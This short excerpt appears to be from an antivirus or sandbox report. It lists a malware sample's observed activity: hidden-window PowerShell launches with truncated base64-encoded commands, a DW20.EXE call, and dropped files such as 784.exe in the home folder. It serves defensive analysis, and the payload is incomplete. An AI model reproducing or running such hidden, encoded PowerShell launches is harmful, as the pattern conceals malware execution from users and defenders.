Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1398533.cvr
- %HOMEPATH%\784.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAHQAdABuAGcAYQBsAGIAeABrAGYAPQAnAEoAYQBjAHEAZgBvAHgAYwB5AHcAeAAnADsAJABEAHYAcgBtAHoAegBpAG0AcAAgAD0AIAAnADcAOAA0ACcAOwAkAEMAdwBsAHEAeQBmAG0AcAB0AHYAdQB6AD0AJwBEAGgAdQB5AHEAYgB...' (with a hidden window)